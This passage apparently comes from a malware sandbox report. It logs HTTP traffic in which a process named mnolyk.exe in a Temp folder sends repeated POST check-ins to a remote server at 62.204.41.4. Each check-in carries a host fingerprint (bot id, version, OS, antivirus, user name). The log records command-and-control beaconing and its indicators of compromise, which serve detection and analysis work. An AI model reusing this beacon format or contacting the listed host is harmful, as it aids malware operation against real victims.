Feb 7, 2023 20:01:30.125467062 CET	268	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:30.190821886 CET	268	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
142	192.168.2.6	49863	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:30.373661995 CET	269	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:30.437711000 CET	269	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
143	192.168.2.6	49864	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:30.634610891 CET	270	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:30.697523117 CET	270	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
144	192.168.2.6	49865	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:30.873059034 CET	271	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:30.936146021 CET	271	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
145	192.168.2.6	49866	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:31.109834909 CET	272	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:31.173635960 CET	272	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
146	192.168.2.6	49867	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:31.342485905 CET	273	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:31.406632900 CET	273	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
147	192.168.2.6	49868	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:31.598757029 CET	274	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:31.661962032 CET	274	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
148	192.168.2.6	49869	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:31.842864037 CET	275	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:31.907516003 CET	275	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:31 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
149	192.168.2.6	49870	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:32.078335047 CET	275	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:32.142682076 CET	276	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.6	49733	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:54.497422934 CET	120	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:54.562045097 CET	120	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
150	192.168.2.6	49871	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:32.342194080 CET	276	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:32.405644894 CET	277	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
151	192.168.2.6	49872	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:32.599241018 CET	277	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:32.663626909 CET	278	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
152	192.168.2.6	49873	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:32.847820044 CET	278	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:32.911439896 CET	279	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
153	192.168.2.6	49874	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:33.109252930 CET	279	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:33.173959970 CET	280	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
154	192.168.2.6	49875	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:33.341459990 CET	281	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:33.405076027 CET	281	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
155	192.168.2.6	49876	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:33.586090088 CET	282	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:33.649971008 CET	282	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
156	192.168.2.6	49877	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:33.832947016 CET	283	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:33.894639015 CET	283	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:33 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
157	192.168.2.6	49878	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:34.080303907 CET	284	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:34.146358967 CET	284	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
158	192.168.2.6	49879	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:34.335803986 CET	285	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:34.399455070 CET	285	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
159	192.168.2.6	49881	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:34.599060059 CET	286	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:34.663373947 CET	292	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:34 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.6	49734	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:54.737090111 CET	121	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:54.802834034 CET	121	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
160	192.168.2.6	49882	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:34.875626087 CET	293	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
